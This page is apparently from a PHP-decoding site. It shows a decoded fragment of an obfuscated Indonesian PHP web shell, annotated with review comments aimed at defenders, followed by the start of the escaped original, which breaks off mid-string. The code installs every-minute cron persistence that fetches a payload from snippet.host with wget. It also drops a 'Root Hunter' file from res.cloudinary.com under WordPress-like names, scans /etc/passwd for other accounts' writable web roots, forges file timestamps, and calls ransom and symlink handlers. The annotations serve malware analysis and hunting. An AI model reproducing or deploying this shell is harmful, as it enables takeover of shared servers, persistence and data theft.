PHP Decode
goto GpOwm; BxahF: if ($_GET["\x61\153\x73\151"] == "\x73\x79\x6d\x72\145\141\144") { III..
Decoded Output download
<?
// REVIEW NOTE (annotation only; every code token below is as the decoder emitted it).
//
// What this is: a fragment of a goto-obfuscated PHP web shell. The fragments are
// listed in shuffled order and most goto targets (GpOwm, qk_sa, PS3VR, IRMhO,
// tgxbG, DGXlf, kV2xI, T4EHp, vKC7m, usbii, HgISA, AjK8T, UBaO0, eLB0i, JNqQW,
// aV7hf, AFmQi) are not part of this listing, so the real execution order
// cannot be read off from here.
//
// Decoder caveat: inner double quotes were written unescaped (for example
// method="post" inside a double-quoted echo), so this listing does not parse
// as PHP. Treat it as reading material; the encoded original keeps those
// quotes as \42 / \x22 escapes.
//
// Entry points visible here are plain request parameters: `aksi`,
// `changedatenya`, `findwrite` in $_GET and `jump`, `url`, `deployrhws`,
// `bikin`, `nama_file`, `isi_file` in $_POST. No access check appears in this
// fragment; whether one exists elsewhere in the sample cannot be told from here.
//
// Indicators that appear literally in this listing (useful for hunting):
//   - outbound fetches to snippet.host and res.cloudinary.com
//   - files auto_admin.php, footer_OLD.php, wp-includes/pomo/singular-forms.php
//   - scratch files date.txt and writable.txt
//   - a crontab entry scheduled `* * * * *` that calls wget
//
// Helpers ex(), bing(), w(), ransom(), modules() and the other obfuscated
// handler names called from the dispatch lines are not defined in this
// listing. ex() presumably runs a shell command and returns its output;
// confirm against the full sample.
goto GpOwm;
// Dispatch: aksi=symread -> IIIIIII11lI1() (body not in this listing).
BxahF: if ($_GET["aksi"] == "symread") { IIIIIII11lI1($dir, $file); } goto qk_sa;
// Dispatch: aksi=ransom -> ransom() (body not in this listing).
Y0Kw9: if ($_GET["aksi"] == "ransom") { ransom($dir, $file); } goto PS3VR;
// Dispatch: aksi=buat_file -> IIIIIIIlllll(), the file-creation form defined further down.
lzT0f: if ($_GET["aksi"] == "buat_file") { IIIIIIIlllll($dir, $IIIIIIII1l1l); } goto IRMhO;
// IIIIIIII1l11(): formats a byte count for display. Divides by 1024 until the
// value is below 1024 or the unit list (B..TB) runs out, then returns the
// value rounded to two decimals followed by the unit. No security relevance.
jGTWq: function IIIIIIII1l11($IIIIIIII11II) { $IIIIIIII11Il = array("B", "KB", "MB", "GB", "TB"); for ($IIIIIIII11I1 = 0; $IIIIIIII11II >= 1024 && $IIIIIIII11I1 < count($IIIIIIII11Il) - 1; $IIIIIIII11II /= 1024, $IIIIIIII11I1++) { } return round($IIIIIIII11II, 2) . " " . $IIIIIIII11Il[$IIIIIIII11I1]; } goto tgxbG;
// IIIIIII1IIlI(): enumerates web roots of OTHER accounts on the same host and
// marks each as readable [R] or readable+writable [RW]. Three layouts, chosen
// by substring match on $dir:
//   1. "hsphere": for every submitted `url` line and every user name in
//      /etc/passwd it tests /hsphere/local/home/<user>/<url>. Without a POSTed
//      `jump` it shows a form pre-filled from
//      /hsphere/local/config/httpd/sites/sites.txt.
//   2. "vhosts": tests /var/www/vhosts/<url>/httpdocs per submitted line; the
//      form is pre-filled by bing("ip:<third argument>").
//   3. otherwise: takes user names from /etc/passwd (regex on ":x:") and tests
//      /home/<user>/public_html; when posix_getpwuid() exists it also reads
//      /etc/named.conf and matches the owner of /etc/valiases/<zone> to the
//      user to label the directory with a domain name.
// It prints a running total (Indonesian UI text, roughly "N rooms in total
// at ...") and ends the request with die.
// Defender view: every hit means one account's PHP process can read or write
// another account's document root. Per-account isolation (separate users,
// restrictive home directory modes, open_basedir) is what makes these checks
// fail. Paths and POSTed values are echoed into HTML without escaping.
mi15o: function IIIIIII1IIlI($dir, $file, $IIIIIIII1III) { $IIIIIIII11I1 = 0; echo "<div class='card container'>"; if (preg_match("/hsphere/", $dir)) { $IIIIIII1IIl1 = explode("\xa", $_POST["url"]); if (isset($_POST["jump"])) { echo "<pre>"; foreach ($IIIIIII1IIl1 as $url) { $url = str_replace(array("http://", "www."), '', strtolower($url)); $IIIIIII1II11 = "/etc/passwd"; $IIIIIII1IlII = fopen($IIIIIII1II11, "r"); while ($IIIIIII1IlIl = fgets($IIIIIII1IlII)) { $IIIIIII1IlI1 = explode(":", $IIIIIII1IlIl); $user = $IIIIIII1IlI1[0]; $IIIIIII1Illl = "/hsphere/local/home/{$user}"; if (is_dir($IIIIIII1Illl) === true) { $IIIIIII1Ill1 = $IIIIIII1Illl . "/" . $url; if (is_readable($IIIIIII1Ill1)) { $IIIIIIII11I1++; $IIIIIII1Il1I = "[<font color=green>R</font>] <a href='?dir={$IIIIIII1Ill1}'><font color=#0046FF>{$IIIIIII1Ill1}</font></a>"; if (is_writable($IIIIIII1Ill1)) { $IIIIIII1Il1I = "[<font color=green>RW</font>] <a href='?dir={$IIIIIII1Ill1}'><font color=#0046FF>{$IIIIIII1Ill1}</font></a>"; } echo $IIIIIII1Il1I . "<br>"; } } } } if (!$IIIIIIII11I1 == 0) { echo "<br>Total ada {$IIIIIIII11I1} KAMAR di {$IIIIIIII1III}"; } echo "</pre>"; } else { echo "<center><form method="post">
List Domains: <br>
<textarea name="url" class="form-control">"; $IIIIIII1Il1l = fopen("/hsphere/local/config/httpd/sites/sites.txt", "r"); while ($IIIIIII1Il11 = fgets($IIIIIII1Il1l)) { echo $IIIIIII1Il11; } echo "</textarea><br>
<input type="submit" value="Jumping" name="jump" class="btn btn-danger btn-block">
</form></center>"; } } elseif (preg_match("/vhosts/", $dir)) { $IIIIIII1IIl1 = explode("
", $_POST["url"]); if (isset($_POST["jump"])) { echo "<pre>"; foreach ($IIIIIII1IIl1 as $url) { $IIIIIII1I1II = "/var/www/vhosts/{$url}/httpdocs"; if (is_dir($IIIIIII1I1II) === true) { if (is_readable($IIIIIII1I1II)) { $IIIIIIII11I1++; $IIIIIII1Il1I = "[<font color=green>R</font>] <a href='?dir={$IIIIIII1I1II}'><font color=#0046FF>{$IIIIIII1I1II}</font></a>"; if (is_writable($IIIIIII1I1II)) { $IIIIIII1Il1I = "[<font color=green>RW</font>] <a href='?dir={$IIIIIII1I1II}'><font color=#0046FF>{$IIIIIII1I1II}</font></a>"; } echo $IIIIIII1Il1I . "<br>"; } } } if (!$IIIIIIII11I1 == 0) { echo "<br>Total ada {$IIIIIIII11I1} Kamar Di {$IIIIIIII1III}"; } echo "</pre>"; } else { echo "<center><form method="post">
List Domains: <br>
<textarea name="url" class="form-control">"; bing("ip:{$IIIIIIII1III}"); echo "</textarea><br>\xa<input type="submit" value="Jumping" name="jump" class="btn btn-danger btn-block">
</form></center>"; } } else { echo "<pre>"; $IIIIIII1II11 = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font><br/>"); while ($passwd = fgets($IIIIIII1II11)) { if ($passwd == '' || !$IIIIIII1II11) { echo "<font color=red>Can't read /etc/passwd</font><br/>"; } else { preg_match_all("/(.*?):x:/", $passwd, $IIIIIII1I1I1); foreach ($IIIIIII1I1I1[1] as $IIIIIII1I1lI) { $IIIIIII1I1ll = "/home/{$IIIIIII1I1lI}/public_html"; if (is_readable($IIIIIII1I1ll)) { $IIIIIIII11I1++; $IIIIIII1Il1I = "[<font color=green>R</font>] <a href='?dir={$IIIIIII1I1ll}'><font color=#0046FF>{$IIIIIII1I1ll}</font></a>"; if (is_writable($IIIIIII1I1ll)) { $IIIIIII1Il1I = "[<font color=green>RW</font>] <a href='?dir={$IIIIIII1I1ll}'><font color=#0046FF>{$IIIIIII1I1ll}</font></a>"; } echo $IIIIIII1Il1I; if (function_exists("posix_getpwuid")) { $IIIIIII1I1l1 = file_get_contents("/etc/named.conf"); if ($IIIIIII1I1l1 == '') { echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>"; } else { preg_match_all("#/var/named/(.*?).db#", $IIIIIII1I1l1, $IIIIIII1I11I); foreach ($IIIIIII1I11I[1] as $IIIIIII1I11l) { $IIIIIII1I111 = posix_getpwuid(@fileowner("/etc/valiases/{$IIIIIII1I11l}")); $IIIIIII1I111 = $IIIIIII1I111["name"]; if ($IIIIIII1I111 == $IIIIIII1I1lI) { echo " => ( <u>{$IIIIIII1I11l}</u> )<br>"; break; } } } } else { echo "<br>"; } } } } } if (!$IIIIIIII11I1 == 0) { echo "<br>Total ada {$IIIIIIII11I1} kamar di {$IIIIIIII1III}"; } echo "</pre>"; } echo "</div><br/>"; die; } goto DGXlf;
// Dispatch: aksi=passwbypass -> IIIIIII1lll1() (body not in this listing).
QR2gb: if ($_GET["aksi"] == "passwbypass") { IIIIIII1lll1($dir, $file); } goto kV2xI;
// GET `changedatenya`: anti-forensic timestamp rewriting. Lists the named
// directory into date.txt, then runs `touch -mt` on every listed entry with a
// stamp that starts with "201" and is filled in from three `shuf` draws, and
// finally deletes date.txt. `touch -mt` rewrites the modification time only,
// so on an affected host mtime is not a reliable "last changed" signal;
// compare it with the inode change time and with backups or deployment
// records. The request value is concatenated into the shell command lines.
GVG6U: if (isset($_GET["changedatenya"])) { $IIIIIIlllI11 = $_GET["changedatenya"]; echo "<pre class='text-white'>" . ex("ls '{$IIIIIIlllI11}' > date.txt") . "</pre>"; ex("for i in $(cat date.txt);do touch -mt $(echo 201$(shuf -i0-12 -n1)0$(shuf -i0-12 -n1)0$(shuf -i0-12 -n1)0000) " . $_GET["changedatenya"] . "/$i;done"); echo "<p class='text-white'>[+] Done!<br>[*] Not Working? 
<a href='?dir=" . $dir . "&aksi=ngebepass'>Bypass it</a></p></div></div>"; ex("rm -rf date.txt"); die; } goto T4EHp;
// Reads PHP's disable_functions setting into a variable; how it is used is
// outside this listing (NOTE(review): presumably to report or work around
// disabled functions; confirm against the full sample).
t_iiR: $IIIIIIII1llI = @ini_get("disable_functions"); goto vKC7m;
// UI fragment: prints the result of w($dir, IIIIIIIIl1II($dir)); both helpers
// are defined outside this listing.
XzELM: echo " [ " . w($dir, IIIIIIIIl1II($dir)) . " ]</span>"; goto usbii;
// IIIIIIIlI1Il(): persistence through the crontab of the account that runs
// PHP. It pipes a single entry into `crontab` (where the local crontab accepts
// a table on stdin this replaces the account's whole existing table). The
// entry is scheduled `* * * * *`, i.e. every minute, and uses wget to
// re-download a file from snippet.host to auto_admin.php in the working
// directory. `crontab -l` is then run to show whether the install worked
// ("Failed Memasang" is the shell's own failure message).
// Cleanup consequence: removing the PHP files alone is not enough, because the
// cron entry re-creates auto_admin.php until it is removed; legitimate cron
// jobs of that account may need restoring.
OPGhy: function IIIIIIIlI1Il($dir) { echo "<div class="card mb-5">
<div class="card-body form-group">
<p class="text-muted">Crontab Shell</p>\xa"; ex("pwd=$(pwd);echo "* * * * * wget -O $pwd/auto_admin.php https://snippet.host/pwxy/raw" | crontab"); $IIIIIIIlI1I1 = ex("crontab -l"); if ($IIIIIIIlI1I1 == '') { echo "<p class="font-weight-bold text-danger">[-] Failed Memasang</p></div></div>"; } else { echo "<p class="font-weight-bold text-success">[+] Running Crontab : </br>" . ex("crontab -l") . "</p></div></div>"; } } goto HgISA;
// GET `findwrite`: lists the named directory into date.txt, then runs
// `find <value> -type d -writable` into writable.txt and prints each result.
// The request value is concatenated into the shell command lines. Neither
// date.txt nor writable.txt is removed in this fragment, so both may remain
// as artifacts wherever ex() runs its commands.
LFiqG: if (isset($_GET["findwrite"])) { $IIIIIIlllI11 = $_GET["findwrite"]; echo "<pre class='text-white'>" . ex("ls '{$IIIIIIlllI11}' > date.txt") . "</pre>"; ex("find " . $_GET["findwrite"] . " -type d -writable > writable.txt"); echo "<p class='text-white'>[+] Found : </p><br><p class='text-white'>" . ex("for i in $(cat writable.txt);do printf "$i => Found\xa";done") . "</p></div></div>"; die; } goto AjK8T;
// Dispatch: aksi=symlink -> IIIIIII1l1l1() (body not in this listing).
DjebA: if ($_GET["aksi"] == "symlink") { IIIIIII1l1l1($dir, $file); } goto UBaO0;
// deployrh(): second-stage dropper, labelled "Root Hunter v1" by its own UI
// strings. When POST field `deployrhws` is set it:
//   - picks a base directory: realpath(__DIR__) when that differs from
//     DOCUMENT_ROOT, otherwise DOCUMENT_ROOT;
//   - reports "Sudah Ada" (Indonesian, roughly "already exists") when
//     <base>/wp-includes/pomo/singular-forms.php or <base>/footer_OLD.php is
//     already present;
//   - downloads $src (a hard-coded res.cloudinary.com URL ending in .txt) with
//     file_get_contents() and writes it to the pomo path when that directory
//     exists and is writable, otherwise to footer_OLD.php;
//   - calls chmod(..., 292); 292 decimal is 0444 octal, read-only for all;
//   - prints a link to the written file built from the HTTPS and HTTP_HOST
//     request values ("Berhasil" / "Gagal" are roughly "succeeded" / "failed").
// Defender view: both file names are chosen to blend into a WordPress tree.
// Verify files under wp-includes against a clean copy of the same release
// rather than trusting names, and treat PHP-initiated outbound fetches from a
// web root as a detection point.
IGcBk: function deployrh($dir) { echo "<div class="card mb-5">\xa<div class="card-body form-group">"; echo "<p class="text-warning text-center font-weight-bold">[+] Deploying Root Hunter v1</p>"; echo "<form method="post">"; echo "<center><input class="btn btn-success" type="submit" name="deployrhws" value="Deploy Root Hunter"></center>"; echo "</form>"; if (isset($_POST["deployrhws"])) { $deployrh_result = ''; $startDirectory = realpath(__DIR__); if (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on") { $url = "https://"; } else { $url = "http://"; } $url .= $_SERVER["HTTP_HOST"]; if ($startDirectory !== $_SERVER["DOCUMENT_ROOT"]) { $rhws_path = $startDirectory . "/wp-includes/pomo/"; $rhws = $startDirectory . "/wp-includes/pomo/singular-forms.php"; $doc = $startDirectory . "/footer_OLD.php"; $cleaned = str_replace($startDirectory, '', $rhws_path); $cleaned_doc = str_replace($startDirectory, '', $doc); } else { $rhws_path = $_SERVER["DOCUMENT_ROOT"] . "/wp-includes/pomo/"; $rhws = $_SERVER["DOCUMENT_ROOT"] . 
"/wp-includes/pomo/singular-forms.php"; $doc = $_SERVER["DOCUMENT_ROOT"] . "/footer_OLD.php"; $cleaned = str_replace($_SERVER["DOCUMENT_ROOT"], '', $rhws_path); $cleaned_doc = str_replace($_SERVER["DOCUMENT_ROOT"], '', $doc); } $src = "https://res.cloudinary.com/dbassets/raw/upload/v1652038152/tool/class-category_gugz7q.txt"; if (file_exists($rhws)) { $deployrh_result .= "<span class="text-center text-info font-weight-bold;">[+] Root Hunter v1 Sudah Ada!</span><br/>"; $deployrh_result .= "<span class="text-center text-info font-weight-bold;"><a href="" . $url . $cleaned . "" target="_blank" rel="nofollow noopener noreferrer" class="text-center text-info">" . $url . $cleaned . "</a></span><br/>"; } if (file_exists($doc)) { $deployrh_result .= "<span class="text-center text-info font-weight-bold;">[+] Root Hunter v1 Sudah Ada!</span><br/>"; $deployrh_result .= "<span class="text-center text-info font-weight-bold;"><a href="" . $url . $cleaned_doc . "" target="_blank" rel="nofollow noopener noreferrer" class="text-center text-info">" . $url . $cleaned_doc . "</a></span><br/>"; } if (is_dir($rhws_path) && is_writable($rhws_path)) { $content = file_get_contents($src); $status = file_put_contents($rhws, $content); if ($status) { $deployrh_result .= "<span class="text-center text-success font-weight-bold;">[+] Berhasil Deploy Root Hunter v1!</span><br/>"; $deployrh_result .= "<span class="text-center text-info font-weight-bold;"><a href="" . $url . $cleaned . "" target="_blank" rel="nofollow noopener noreferrer" class="text-center text-info">" . $url . $cleaned . 
"</a></span><br/><br/>"; chmod($rhws, 292); } else { $deployrh_result .= "<span class="text-center text-danger font-weight-bold;">[-] Gagal Deploy Root Hunter v1!</span><br/>"; } } else { $content = file_get_contents($src); $status = file_put_contents($doc, $content); if ($status) { $deployrh_result .= "<span class="text-center text-success font-weight-bold;">[+] Berhasil Deploy Root Hunter v1!</span><br/>"; $deployrh_result .= "<span class="text-center text-info font-weight-bold;"><a href="" . $url . $cleaned_doc . "" target="_blank" rel="nofollow noopener noreferrer" class="text-center text-info">" . $url . $cleaned_doc . "</a></span><br/><br/>"; chmod($doc, 292); } else { $deployrh_result .= "<span class="text-center text-danger font-weight-bold;">[-] Gagal Deploy Root Hunter v1!</span><br/>"; } } echo "<div style="border-bottom:0;margin-top:5px;" readonly>"; echo "<center>"; print_r($deployrh_result) . PHP_EOL; echo "</center>"; echo "</div>"; } echo "</div></div>"; } goto eLB0i;
// Dispatch: aksi=rename -> IIIIIIIll11I() (body not in this listing).
bYCUl: if ($_GET["aksi"] == "rename") { IIIIIIIll11I($dir, $file, $IIIIIIIlllIl, $IIIIIIII1l1l); } goto JNqQW;
// IIIIIIIlllll(): file-creation form ("Buat File" is Indonesian, roughly
// "create file"). On POST `bikin` it opens every name in nama_file[] for
// writing and writes isi_file into it. Names and content come straight from
// the request with no path restriction, so this writes wherever the PHP
// process user has write permission. fopen/fwrite errors are silenced with @,
// and only the result of the last name decides the success or failure
// message passed to IIIIIIIlIl1I() (defined outside this listing).
Ou_xB: function IIIIIIIlllll($dir, $IIIIIIII1l1l) { echo "<h4>{$IIIIIIII1l1l} Buat File :</h4>\xa<form method='POST'>\xa<div class='input-group'>\xa<input type='text' class='form-control' name='nama_file[]' placeholder='Nama File...'>
<div class='input-group-prepend'>
<div class='input-group-text'><a id='add_input'><i class='fa fa-plus'></i></a></div>\xa</div>\xa</div><br/>\xa<div id='output'></div>
<textarea name='isi_file' class='form-control' rows='15' placeholder='Isi File...'></textarea><br/>
<input type='submit' class='btn btn-success btn-block mb-5' name='bikin' value='Buat'>
</form>"; if (isset($_POST["bikin"])) { $name = $_POST["nama_file"]; $isi_file = $_POST["isi_file"]; foreach ($name as $nama_file) { $IIIIIIIIlI1l = @fopen("{$nama_file}", "w"); if ($isi_file) { $buat = @fwrite($IIIIIIIIlI1l, $isi_file); } else { $buat = $IIIIIIIIlI1l; } } if ($buat) { $IIIIIIIlIl1l = "success"; $IIIIIIIlIl11 = "Berhasil Membuat File"; IIIIIIIlIl1I($IIIIIIIlIl1l, $IIIIIIIlIl11, $dir); } else { $IIIIIIIlIl1l = "error"; $IIIIIIIlIl11 = "Gagal Membuat File"; IIIIIIIlIl1I($IIIIIIIlIl1l, $IIIIIIIlIl11, $dir); } } } goto aV7hf;
// Dispatch: aksi=modules -> modules() (body not in this listing).
VduaH: if ($_GET["aksi"] == "modules") { modules($dir); } goto AFmQi;
// Final label of the fragment; the PHP block closes here.
omEN2: ?>
Original Code
goto GpOwm; BxahF: if ($_GET["\x61\153\x73\151"] == "\x73\x79\x6d\x72\145\141\144") { IIIIIII11lI1($dir, $file); } goto qk_sa; Y0Kw9: if ($_GET["\x61\x6b\163\151"] == "\x72\x61\x6e\x73\x6f\155") { ransom($dir, $file); } goto PS3VR; lzT0f: if ($_GET["\x61\x6b\x73\x69"] == "\142\x75\x61\164\137\146\x69\x6c\x65") { IIIIIIIlllll($dir, $IIIIIIII1l1l); } goto IRMhO; jGTWq: function IIIIIIII1l11($IIIIIIII11II) { $IIIIIIII11Il = array("\x42", "\x4b\x42", "\115\x42", "\107\102", "\x54\102"); for ($IIIIIIII11I1 = 0; $IIIIIIII11II >= 1024 && $IIIIIIII11I1 < count($IIIIIIII11Il) - 1; $IIIIIIII11II /= 1024, $IIIIIIII11I1++) { } return round($IIIIIIII11II, 2) . "\x20" . $IIIIIIII11Il[$IIIIIIII11I1]; } goto tgxbG; mi15o: function IIIIIII1IIlI($dir, $file, $IIIIIIII1III) { $IIIIIIII11I1 = 0; echo "\x3c\x64\151\x76\40\143\154\141\x73\x73\75\x27\x63\x61\x72\144\x20\143\157\156\x74\x61\x69\x6e\145\x72\x27\76"; if (preg_match("\57\x68\163\x70\150\x65\162\145\57", $dir)) { $IIIIIII1IIl1 = explode("\xa", $_POST["\165\x72\154"]); if (isset($_POST["\x6a\165\155\160"])) { echo "\x3c\160\162\145\76"; foreach ($IIIIIII1IIl1 as $url) { $url = str_replace(array("\150\164\x74\x70\x3a\57\x2f", "\x77\167\167\56"), '', strtolower($url)); $IIIIIII1II11 = "\x2f\x65\164\143\57\x70\141\x73\163\x77\x64"; $IIIIIII1IlII = fopen($IIIIIII1II11, "\162"); while ($IIIIIII1IlIl = fgets($IIIIIII1IlII)) { $IIIIIII1IlI1 = explode("\x3a", $IIIIIII1IlIl); $user = $IIIIIII1IlI1[0]; $IIIIIII1Illl = "\57\x68\163\x70\150\x65\x72\145\57\154\x6f\143\x61\154\x2f\150\157\155\x65\x2f{$user}"; if (is_dir($IIIIIII1Illl) === true) { $IIIIIII1Ill1 = $IIIIIII1Illl . "\x2f" . 
$url; if (is_readable($IIIIIII1Ill1)) { $IIIIIIII11I1++; $IIIIIII1Il1I = "\x5b\74\x66\157\x6e\x74\x20\x63\157\154\157\162\x3d\147\162\145\x65\x6e\x3e\x52\x3c\x2f\x66\x6f\156\164\76\135\40\74\x61\40\150\162\145\x66\x3d\x27\77\x64\x69\162\x3d{$IIIIIII1Ill1}\x27\76\x3c\146\x6f\x6e\x74\40\143\x6f\x6c\x6f\162\75\x23\60\x30\64\x36\106\x46\x3e{$IIIIIII1Ill1}\74\57\146\157\156\164\76\x3c\57\x61\x3e"; if (is_writable($IIIIIII1Ill1)) { $IIIIIII1Il1I = "\133\74\x66\x6f\156\x74\x20\x63\x6f\x6c\x6f\x72\75\147\x72\x65\x65\x6e\x3e\122\x57\74\57\146\157\x6e\x74\x3e\135\40\x3c\x61\x20\x68\162\145\146\75\47\77\x64\151\x72\x3d{$IIIIIII1Ill1}\47\x3e\74\146\x6f\156\x74\x20\x63\157\154\x6f\162\75\43\x30\60\64\x36\106\x46\76{$IIIIIII1Ill1}\x3c\57\146\157\x6e\x74\x3e\74\57\141\76"; } echo $IIIIIII1Il1I . "\74\x62\162\76"; } } } } if (!$IIIIIIII11I1 == 0) { echo "\74\x62\162\x3e\124\x6f\x74\141\x6c\x20\141\x64\x61\40{$IIIIIIII11I1}\x20\113\x41\x4d\101\x52\40\144\151\x20{$IIIIIIII1III}"; } echo "\x3c\x2f\x70\162\x65\x3e"; } else { echo "\x3c\143\x65\x6e\x74\145\162\x3e\74\x66\x6f\162\x6d\x20\x6d\x65\164\x68\x6f\x64\x3d\42\160\157\163\164\x22\x3e\12\114\151\163\164\40\x44\157\x6d\141\x69\156\163\x3a\x20\x3c\142\x72\76\12\74\164\x65\x78\x74\141\162\145\x61\40\156\141\155\x65\75\42\165\162\154\x22\x20\x63\154\x61\x73\x73\x3d\42\x66\x6f\162\x6d\x2d\143\157\156\164\x72\x6f\x6c\42\76"; $IIIIIII1Il1l = fopen("\x2f\x68\163\160\150\x65\x72\x65\x2f\154\157\x63\141\154\x2f\x63\x6f\156\x66\151\x67\x2f\x68\164\164\x70\x64\57\x73\151\x74\x65\x73\57\163\151\x74\145\163\56\164\170\x74", "\162"); while ($IIIIIII1Il11 = fgets($IIIIIII1Il1l)) { echo $IIIIIII1Il11; } echo 
"\74\57\x74\x65\170\164\141\162\x65\x61\x3e\x3c\142\162\76\12\x3c\151\x6e\160\165\x74\40\164\171\x70\145\x3d\42\x73\x75\142\155\x69\x74\x22\40\x76\141\154\x75\x65\x3d\42\112\x75\x6d\160\151\156\147\x22\x20\x6e\x61\155\145\75\42\x6a\165\155\160\x22\x20\143\154\x61\x73\163\75\42\x62\164\x6e\x20\x62\x74\156\55\144\141\156\x67\x65\162\40\x62\164\x6e\x2d\x62\154\x6f\143\x6b\42\76\12\74\57\146\157\162\155\76\x3c\57\x63\x65\x6e\x74\x65\x72\x3e"; } } elseif (preg_match("\x2f\166\150\157\163\164\163\57", $dir)) { $IIIIIII1IIl1 = explode("\12", $_POST["\165\x72\x6c"]); if (isset($_POST["\x6a\x75\155\x70"])) { echo "\74\160\162\145\76"; foreach ($IIIIIII1IIl1 as $url) { $IIIIIII1I1II = "\x2f\x76\141\x72\57\x77\167\x77\x2f\166\x68\x6f\163\x74\163\x2f{$url}\x2f\x68\x74\x74\x70\x64\157\x63\163"; if (is_dir($IIIIIII1I1II) === true) { if (is_readable($IIIIIII1I1II)) { $IIIIIIII11I1++; $IIIIIII1Il1I = "\x5b\74\x66\x6f\156\x74\x20\143\x6f\x6c\157\162\x3d\147\162\x65\145\156\x3e\x52\74\x2f\x66\157\156\164\x3e\135\40\x3c\141\x20\150\x72\x65\146\x3d\x27\77\144\151\162\75{$IIIIIII1I1II}\47\76\x3c\146\157\x6e\164\x20\143\157\154\157\x72\x3d\43\x30\60\x34\66\x46\106\76{$IIIIIII1I1II}\74\57\x66\157\x6e\164\76\x3c\x2f\141\x3e"; if (is_writable($IIIIIII1I1II)) { $IIIIIII1Il1I = "\133\x3c\x66\157\156\x74\x20\143\157\154\157\x72\x3d\x67\x72\x65\145\x6e\x3e\122\127\x3c\57\146\x6f\156\x74\76\135\x20\x3c\141\40\x68\162\x65\x66\75\47\x3f\x64\x69\x72\x3d{$IIIIIII1I1II}\x27\x3e\x3c\x66\x6f\156\164\40\143\x6f\154\157\162\x3d\43\60\x30\64\x36\x46\x46\76{$IIIIIII1I1II}\x3c\57\146\x6f\156\x74\76\74\x2f\141\76"; } echo $IIIIIII1Il1I . 
"\x3c\142\x72\x3e"; } } } if (!$IIIIIIII11I1 == 0) { echo "\74\x62\x72\76\x54\x6f\164\141\x6c\x20\141\x64\141\40{$IIIIIIII11I1}\x20\x4b\x61\x6d\x61\x72\40\104\151\40{$IIIIIIII1III}"; } echo "\74\x2f\x70\x72\x65\x3e"; } else { echo "\74\143\x65\156\x74\x65\162\x3e\x3c\x66\x6f\x72\x6d\x20\155\x65\164\150\157\144\x3d\42\160\x6f\x73\164\42\76\12\114\151\x73\x74\40\104\x6f\x6d\141\151\156\x73\72\x20\74\x62\162\x3e\12\x3c\x74\x65\170\164\141\x72\x65\141\40\156\141\x6d\x65\75\42\x75\162\x6c\42\40\x63\154\x61\163\x73\x3d\x22\146\x6f\x72\155\x2d\x63\157\156\x74\162\157\x6c\x22\76"; bing("\x69\160\72{$IIIIIIII1III}"); echo "\x3c\x2f\x74\145\170\x74\141\162\145\141\76\74\x62\x72\76\xa\x3c\x69\156\160\x75\x74\40\164\171\160\x65\x3d\42\x73\165\x62\155\151\164\x22\x20\x76\x61\x6c\x75\145\75\x22\112\x75\x6d\160\x69\156\147\x22\40\x6e\x61\x6d\x65\75\x22\152\165\155\160\x22\x20\x63\x6c\x61\163\163\75\x22\x62\164\x6e\40\142\x74\156\x2d\144\x61\x6e\x67\145\x72\40\142\x74\x6e\x2d\142\154\x6f\x63\153\x22\x3e\12\x3c\x2f\146\157\162\x6d\76\x3c\57\x63\145\156\164\145\162\76"; } } else { echo "\74\160\162\x65\76"; $IIIIIII1II11 = fopen("\57\x65\164\143\57\160\x61\163\163\x77\144", "\x72") or die("\74\x66\157\156\164\x20\143\x6f\154\157\x72\75\162\145\144\76\x43\x61\x6e\47\x74\40\162\145\x61\x64\x20\x2f\145\x74\x63\57\x70\141\x73\163\167\144\x3c\57\146\x6f\x6e\164\76\x3c\x62\x72\x2f\x3e"); while ($passwd = fgets($IIIIIII1II11)) { if ($passwd == '' || !$IIIIIII1II11) { echo "\74\x66\157\x6e\164\40\143\157\x6c\x6f\x72\75\162\145\x64\x3e\x43\x61\156\47\164\x20\x72\145\x61\144\x20\x2f\x65\164\x63\x2f\x70\x61\163\163\x77\x64\x3c\57\146\157\x6e\x74\76\x3c\x62\162\57\76"; } else { preg_match_all("\x2f\50\x2e\52\x3f\51\72\170\72\x2f", $passwd, $IIIIIII1I1I1); foreach ($IIIIIII1I1I1[1] as $IIIIIII1I1lI) { $IIIIIII1I1ll = "\x2f\x68\x6f\x6d\x65\57{$IIIIIII1I1lI}\x2f\160\165\x62\x6c\151\x63\137\x68\x74\x6d\154"; if (is_readable($IIIIIII1I1ll)) { $IIIIIIII11I1++; $IIIIIII1Il1I = 
"\133\x3c\x66\157\156\x74\x20\143\157\154\157\162\x3d\x67\x72\x65\x65\156\76\x52\x3c\x2f\146\157\156\x74\76\135\40\x3c\141\x20\150\x72\x65\x66\75\x27\77\x64\x69\x72\x3d{$IIIIIII1I1ll}\47\76\74\146\x6f\156\164\x20\143\157\154\x6f\162\75\x23\60\60\64\x36\106\x46\x3e{$IIIIIII1I1ll}\74\57\146\157\156\x74\x3e\x3c\57\x61\x3e"; if (is_writable($IIIIIII1I1ll)) { $IIIIIII1Il1I = "\133\74\146\157\x6e\x74\40\x63\x6f\x6c\x6f\x72\75\x67\x72\145\x65\156\x3e\x52\x57\74\57\x66\157\156\x74\x3e\x5d\40\x3c\141\x20\150\162\x65\x66\x3d\47\x3f\144\151\x72\75{$IIIIIII1I1ll}\x27\76\74\146\x6f\x6e\164\x20\143\x6f\154\157\162\x3d\x23\60\60\x34\x36\106\106\x3e{$IIIIIII1I1ll}\74\57\146\x6f\156\164\76\x3c\x2f\x61\x3e"; } echo $IIIIIII1Il1I; if (function_exists("\x70\157\163\151\x78\x5f\x67\145\164\160\x77\x75\x69\144")) { $IIIIIII1I1l1 = file_get_contents("\57\x65\x74\x63\x2f\156\141\155\x65\x64\56\143\157\156\146"); if ($IIIIIII1I1l1 == '') { echo "\40\x3d\76\40\50\40\74\x66\x6f\x6e\x74\x20\x63\x6f\154\157\x72\75\162\145\144\x3e\147\x61\142\151\163\x61\40\x61\155\142\x69\x6c\40\x6e\141\155\141\x20\x64\157\155\x61\x69\x6e\x20\x6e\x79\141\x3c\x2f\146\157\156\164\76\40\x29\74\142\162\x3e"; } else { preg_match_all("\43\57\166\141\x72\x2f\156\141\155\x65\144\x2f\x28\56\52\77\51\x2e\x64\x62\43", $IIIIIII1I1l1, $IIIIIII1I11I); foreach ($IIIIIII1I11I[1] as $IIIIIII1I11l) { $IIIIIII1I111 = posix_getpwuid(@fileowner("\x2f\145\x74\x63\57\x76\x61\154\x69\x61\163\145\163\x2f{$IIIIIII1I11l}")); $IIIIIII1I111 = $IIIIIII1I111["\156\141\155\145"]; if ($IIIIIII1I111 == $IIIIIII1I1lI) { echo 